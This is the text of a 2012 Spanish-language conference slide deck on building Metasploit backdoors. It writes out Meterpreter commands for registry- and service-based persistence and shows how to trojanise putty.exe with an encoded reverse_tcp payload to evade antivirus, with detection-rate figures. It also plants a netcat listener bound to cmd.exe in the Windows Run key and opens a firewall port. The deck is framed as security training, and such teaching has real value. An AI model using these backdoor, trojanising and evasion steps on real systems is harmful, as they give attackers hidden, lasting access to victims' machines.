Linux Week 2012 Dejando la puerta abierta: Making Metasploit Backdoors 13 de Marzo, 2012 Omar Palomino omarc320@gmail.com http://www.el-palomo.com • Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas, CEH, Security+. • Administrador de seguridad de información para La Positiva Vida. • Consultor en seguridad de información. • “10 años” de experiencia en seguridad de información • Psicólogo que aun no comienza sus estudios…. • Escritor en mis tiempos libres: http://www.el-palomo.com http://www.el-palomo.com El objetivo principal de este videotutorial es identificar y promover el uso de herramientas Open Source en el ámbito de seguridad de información, a través del uso del Sistema Operativo Bactrack Linux para la explotación de vulnerabilidades y manteniendo de acceso por medio de backdoors en el sistema vulnerado. Los objetivos específicos son: Identificar los diferentes mecanismos de creación de puertas traseras (backdoors) que permitan el ingreso automatizo a los equipos vulnerados. Mostrar los diversos mecanismos para evadir la detección de backdoors a través de técnicas de encoding. Realizar pruebas de mantenimiento de acceso tras el reinicio del Sistema Operativo. http://www.el-palomo.com Explotación de la vulnerabilidad Explicación de las técnicas de creación de backdoors Técnicas de evasión de antivirus (encoding) Pruebas finales y conclusiones TÉCNICAS DE CREACIÓN DE BACKDOORS Técnicas de instalación de Backdoors Modificación del sistema de registros (REGEDIT) RUN PERSISTENCE 1 Instalación de ejecutables como servicio en el S.O RUN METSVC 2 http://www.el-palomo.com TÉCNICAS DE CREACIÓN DE BACKDOORS Modificación del sistema de registros (REGEDIT) RUN PERSISTENCE Instalación de ejecutables como servicio en el S.O RUN METSVC 1 Técnicas de instalación de Backdoors • COMANDOS: Meterpreter> run persistence -h Meterpreter> run persistence –A –L C:\\ -X –i 10 –p 443 –r <dirección IP BT> Meterpreter> reboot Meterpreter> resource <ruta para desinstalación de backdoor> http://www.el-palomo.com TÉCNICAS DE CREACIÓN DE BACKDOORS Modificación del sistema de registros (REGEDIT) RUN PERSISTENCE Instalación de ejecutables como servicio en el S.O RUN METSVC Técnicas de instalación de Backdoors • COMANDOS: Meterpreter> run metsvc –h Meterpreter> run metsvc –A Meterpreter> use exploit/multi/handler Meterpreter> set payload windows/metsvc_bind_tcp Meterpreter> show options Meterpreter> exploit Meterpreter> run metsvc -r http://www.el-palomo.com 2 Explotación de la vulnerabilidad Explicación de las técnicas de creación de backdoors Técnicas de evasión de antivirus (encoding) Pruebas finales y conclusiones TÉCNICAS DE EVASIÓN DE ANTIVIRUS Técnicas de evasión de ANTIVIRUS ENCODING: SHIKATA_GA_NAI MSFENCONDE 3 Instalación NETCAT REGEDIT 4 http://www.el-palomo.com TÉCNICAS DE EVASIÓN DE ANTIVIRUS ENCODING: SHIKATA_GA_NAI MSFENCONDE Instalación NETCAT REGEDIT 3 Técnicas de evasión de ANTIVIRUS • COMANDOS: 1.- Descargar putty.exe 2.- Crear payload codificado: Root# msfpayload windows/meterpreter/reverse_tcp LHOST=<IP BT> R| msfencode –t exe –x putty.exe – k –o puttybd.exe –e x86/shikata_ga_nai –c 5 Meterpreter> use exploit/multi/handler Meterpreter> set payload windows/meterpreter/reverse_tcp Meterpreter> set LHOST Meterpreter> set LPORT Meterpreter> exploit http://www.el-palomo.com DETECCIÓN DE ANTIVIRUS 45 43 Total de antivirus 40 32 35 Sin encoding 30 24 25 Encoding Shikata Ga Nai 23 23 22 19 20 Encoding Shikata Ga Nai + UPX Encoding Shikata Ga Nai + Countdown 15 10 Encoding Shikata Ga Nai + Countdown + UPX 5 Encoding Shikata Ga Nai + Countdown + call4_dword_xor 0 Total de antivirus Sin encoding Encoding Shikata Ga Nai Encoding Encoding Encoding Encoding Shikata Ga Nai + Shikata Ga Nai + Shikata Ga Nai + Shikata Ga Nai + UPX Countdown Countdown + Countdown + UPX call4_dword_xor http://www.el-palomo.com TÉCNICAS DE EVASIÓN DE ANTIVIRUS ENCODING: SHIKATA_GA_NAI MSFENCONDE Instalación NETCAT REGEDIT Técnicas de evasión de ANTIVIRUS 4 • COMANDOS: 1.- Descargar NETCAT para windows 2.- Modificar registro: Meterpreter> upload nc.exe C:\\Windows\\system32\\ Meterpreter> reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run Meterpreter> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe Ldp 455 -e cmd.exe' Meterpreter> execute -f cmd -i Meterpreter> netsh firewall show portopening Meterpreter> netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL 3.- Conexión al cliente ROOT# nc -v <IP_VICTIMA> 455 http://www.el-palomo.com Sistema Operativo Bactrack GNU Linux contiene la mejor suite de herramientas de auditoría de seguridad de información para construir puertas traseras. Las puertas traseras construidas con Metasploit funcionan correctamente en sistemas operativos sin antivirus y sin firewall interno (no funcionan en caso contrario). Shikata ga nai es una técnica de codificación que permite evadir más del 50% de antivirus del mercado. Las técnicas de codificación no logran evadir todos los antivirus del mercado. Se utilizaron técnicas de modificación de registros y configuración manual del firewall para instalar puertas traseras que funcionen correctamente en sistemas con antivirus y firewall activos. http://www.el-palomo.com Linux Week 2012 Dejando la puerta abierta: Making Metasploit Backdoors 13 de Marzo, 2012 Omar Palomino omarc320@gmail.com http://www.el-palomo.com